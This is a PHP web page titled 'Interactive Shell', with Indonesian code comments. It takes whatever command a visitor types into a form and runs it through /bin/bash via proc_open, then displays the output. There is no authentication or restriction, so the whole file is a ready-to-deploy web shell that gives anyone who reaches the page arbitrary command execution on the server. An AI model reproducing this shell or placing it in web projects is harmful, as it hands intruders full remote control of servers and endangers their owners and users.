<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Interactive Shell</title>
</head>
<body>
    <h1>Interactive Shell</h1>
    <pre>
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Command yang ingin dijalankan
    $command = '/bin/bash';

    // Membuat proses interaktif
    $descriptors = [
        0 => ['pipe', 'r'], // stdin
        1 => ['pipe', 'w'], // stdout
        2 => ['pipe', 'w'], // stderr
    ];

    $process = proc_open($command, $descriptors, $pipes);

    if (is_resource($process)) {
        // Mendapatkan handle untuk stdin, stdout, dan stderr
        $stdin = $pipes[0];
        $stdout = $pipes[1];
        $stderr = $pipes[2];

        // Menulis command yang ingin dijalankan ke stdin
        fwrite($stdin, $_POST["command"] . "\n");
        fwrite($stdin, "exit\n");

        // Membaca output dari stdout dan stderr
        $output = stream_get_contents($stdout);
        $errors = stream_get_contents($stderr);

        // Menutup handle
        fclose($stdin);
        fclose($stdout);
        fclose($stderr);

        // Menunggu proses untuk selesai
        $return_value = proc_close($process);

        // Menampilkan output dan error
        echo htmlspecialchars("Output:\n$output\n");
        echo htmlspecialchars("Errors:\n$errors\n");
    }
}
?>
    </pre>
    <form method="post">
        <label for="command">Enter Command:</label><br>
        <input type="text" id="command" name="command" style="width: 100%;"><br>
        <button type="submit">Submit</button>
    </form>
</body>
</html>